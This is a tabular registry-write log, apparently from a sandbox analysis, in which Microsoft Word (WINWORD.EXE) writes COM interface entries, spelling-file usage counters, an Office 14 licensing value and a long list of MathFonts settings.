HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} | WHTMLControlEvents10 | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} | IPage | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} | IPage | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} | Pages | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} | Pages | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | IMultiPage | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} | IMultiPage | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} | MultiPageEvents | 2904 | WINWORD.EXE | write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} | MultiPageEvents | 2904 | WINWORD.EXE | write
Key | Name | Value | PID | Process | Operation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage | SpellingAndGrammarFiles_3082 | 1324482609 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage | SpellingAndGrammarFiles_3082 | 1324482610 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage | SpellingAndGrammarFiles_1036 | 1324482609 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage | SpellingAndGrammarFiles_1036 | 1324482610 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage | SpellingAndGrammarFiles_1033 | 1324482634 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage | SpellingAndGrammarFiles_1033 | 1324482635 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage | SpellingAndGrammarFiles_3082 | 1324482611 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage | SpellingAndGrammarFiles_3082 | 1324482612 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage | SpellingAndGrammarFiles_1036 | 1324482611 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage | SpellingAndGrammarFiles_1036 | 1324482612 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage | SpellingAndGrammarFiles_1033 | 1324482636 | 2904 | WINWORD.EXE | write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage | SpellingAndGrammarFiles_1033 | 1324482637 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing | C0AC079DA84B4CBD8DBAF1BB44146899 | 01000000270000007B39303134303030302D303033442D303030302D313030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Arial Unicode MS | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Batang | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @BatangChe | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @DFKai-SB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Dotum | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @DotumChe | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @FangSong | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Gulim | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @GulimChe | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Gungsuh | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @GungsuhChe | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @KaiTi | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Malgun Gothic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Meiryo | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Meiryo UI | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Microsoft JhengHei | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @Microsoft YaHei | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @MingLiU | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @MingLiU_HKSCS | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @MingLiU_HKSCS-ExtB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @MingLiU-ExtB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @MS Gothic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @MS Mincho | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @MS PGothic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @MS PMincho | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @MS UI Gothic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @NSimSun | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @PMingLiU | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @PMingLiU-ExtB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @SimHei | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @SimSun | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | @SimSun-ExtB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Agency FB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Aharoni | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Algerian | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Andalus | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Angsana New | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | AngsanaUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Aparajita | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Arabic Typesetting | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Arial | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Arial Black | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Arial Narrow | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Arial Rounded MT Bold | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Arial Unicode MS | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Baskerville Old Face | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Batang | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | BatangChe | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bauhaus 93 | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bell MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Berlin Sans FB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Berlin Sans FB Demi | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bernard MT Condensed | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Blackadder ITC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bodoni MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bodoni MT Black | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bodoni MT Condensed | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bodoni MT Poster Compressed | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Book Antiqua | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bookman Old Style | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bookshelf Symbol 7 | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Bradley Hand ITC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Britannic Bold | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Broadway | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Browallia New | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | BrowalliaUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Brush Script MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Calibri | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Calibri Light | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Californian FB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Calisto MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Cambria | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Cambria Math | 1 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Candara | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Castellar | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Centaur | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Century | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Century Gothic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Century Schoolbook | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Chiller | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Colonna MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Comic Sans MS | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Consolas | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Constantia | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Cooper Black | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Copperplate Gothic Bold | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Copperplate Gothic Light | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Corbel | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Cordia New | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | CordiaUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Courier | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Courier New | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Curlz MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | DaunPenh | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | David | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | DFKai-SB | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | DilleniaUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | DokChampa | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Dotum | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | DotumChe | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Ebrima | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Edwardian Script ITC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Elephant | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Engravers MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Eras Bold ITC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Eras Demi ITC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Eras Light ITC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Eras Medium ITC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Estrangelo Edessa | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | EucrosiaUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Euphemia | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | FangSong | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Felix Titling | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Fixedsys | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Footlight MT Light | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Forte | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Franklin Gothic Book | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Franklin Gothic Demi | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Franklin Gothic Demi Cond | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Franklin Gothic Heavy | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Franklin Gothic Medium | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Franklin Gothic Medium Cond | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | FrankRuehl | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | FreesiaUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Freestyle Script | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | French Script MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gabriola | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Garamond | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gautami | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Georgia | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gigi | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gill Sans MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gill Sans MT Condensed | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gill Sans MT Ext Condensed Bold | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gill Sans Ultra Bold | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gill Sans Ultra Bold Condensed | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gisha | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gloucester MT Extra Condensed | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Goudy Old Style | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Goudy Stout | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gulim | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | GulimChe | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Gungsuh | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | GungsuhChe | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Haettenschweiler | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Harlow Solid Italic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Harrington | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | High Tower Text | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Impact | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Imprint MT Shadow | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Informal Roman | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | IrisUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Iskoola Pota | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | JasmineUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Jokerman | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Juice ITC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | KaiTi | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Kalinga | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Kartika | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Khmer UI | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | KodchiangUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Kokila | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Kristen ITC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Kunstler Script | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Lao UI | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Latha | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Leelawadee | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Levenim MT | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | LilyUPC | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Lucida Bright | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Lucida Calligraphy | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Lucida Console | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Lucida Fax | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Lucida Handwriting | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Lucida Sans | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Lucida Sans Typewriter | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Lucida Sans Unicode | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Magneto | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Maiandra GD | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Malgun Gothic | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Mangal | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Marlett | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Matura MT Script Capitals | 0 | 2904 | WINWORD.EXE | write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts | Meiryo | 0 | 2904 | WINWORD.EXE | write
